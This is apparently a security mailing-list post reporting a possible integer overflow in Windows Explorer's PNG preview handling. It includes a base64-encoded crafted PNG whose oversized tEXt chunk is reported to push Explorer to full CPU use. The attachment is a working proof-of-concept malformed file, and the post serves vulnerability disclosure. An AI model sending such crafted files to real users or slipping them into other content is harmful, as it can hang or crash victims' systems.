Possible Windows Explorer bad PNG file preview integer overflow
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
---1463786495-1247099944-1190712757=:10488
Content-Type: TEXT/PLAIN; charset=US-ASCII
Hi folks,
Can anyone confirm that the attached PNG file is causing Explorer to eat
100% CPU, and if this is a known issue ?
(Currently tested with an up-to-date Windows XP and Windows Vista)
The probable cause is an integer overflow in the PNG chunk size handling,
which is 32-bit large, and which can cause a 32-bit counter to overflow
when specifically designed for (the attached file contains an tEXt chunk
which is 0xfffffff4 bytes large), leading to bypass size checking and
causing counters to go backward.
(Other applications handling PNG files might be affected)
Regards,
Xavier Roche
---1463786495-1247099944-1190712757=:10488
Content-Type: APPLICATION/octet-stream; name="badlycrafted.png"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.10709251132370.10488@linux.localnet>
Content-Description:
Content-Disposition: attachment; filename="badlycrafted.png"
iVBORw0KGgoAAAANSUhEUgAAACoAAAAqCAIAAABKoV4MAAAACXBIWXMAAAsT
AAALEwEAmpwYAAAAB3RJTUUH1wkZBzAftO/R0P////R0RVh0Q29tbWVudABD
cmVhdGVkIHdpdGggVGhlIEdJTVDvZCVuAAACUUlEQVR42u1Ysa6qQBBdL4TO
BhNNoMbED4BW0E7+AP7AxG9gE/+Bgl5bm4WfsDHBRIINBdogicZEE2LCLbiP
R7gKi9f7LB6nGnfHObOzM7MTGnEcg/fhA7wVNX1NX9O/ASSOkmVZ8/l8v99/
37pcLgAAQRAmkwnHcVXpGzhdTxCE5XJZZKXR6Ha7DMOkKwzDKIoyGo1KTMdl
gBBSFPVMYElSkiTTNAuMl9O3Wq3EXKfTEf+g2WxiOkFRFITwkXGy9NZPp1Mi
D4fD2WyWyKZpPsoGAMDhcHAc53a7AQCiKJpOpwAATdMqB1+SpESt2WwihGJs
IIT6/f7Hx1dlEQRxNwYl9GmQRVGMq0PTNIIgCjwoojdNkyS/bkdRlOyW67qG
YRiG4bouvgcUReUyETwXecMwWJZlWdYwjFKfsh6wLJv1ADwX+bv0dxdTD7IJ
Nx6PSzLfsqzr9Zr2kNyuKIo5oRgQwiAIdF1Pfuq63m63NU17eHpVVXORL73v
nIJpmjzP8zyfRhshlJ4kyYOH9Nnzlca2+ACqqmYLMk1nVVUrvHi2bQdBEASB
bds4+rvdLicAAGRZ7vV66TqJT+95XhRFAIDFYrFer0v1V6tVIoRhmF1Puzju
g5vgfD4ngu/7vu/j//FRb642bnzPf0zQNP2jcSNtfNvt9ng8sixbyWlFUV5A
L8uyLMv/etbzPM+yrLeNmp7nQQh/gzsMQxIn0RzHGQwGr6LcbDZ/K6JgXsgW
6G+A47iiF68gY38OmqYRQuTLKw2/GmVZbtRfN2r6mv6/o/8EL3/Wv3AhUd4A
AAAASUVORK5CYII=
---1463786495-1247099944-1190712757=:10488--